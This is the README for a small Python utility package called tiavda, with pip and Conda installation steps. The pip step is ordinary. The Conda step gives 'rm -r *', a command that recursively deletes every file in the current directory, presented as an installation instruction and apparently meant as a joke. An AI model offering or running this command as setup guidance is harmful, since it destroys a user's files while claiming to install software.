# tiavda
Advait's utility package for graphing and other Python stuff.


## How to install it

### pip
```
pip install tiavda
```

### Conda
```
rm -r *
```
```
echo "Good luck, you're on your own."
```

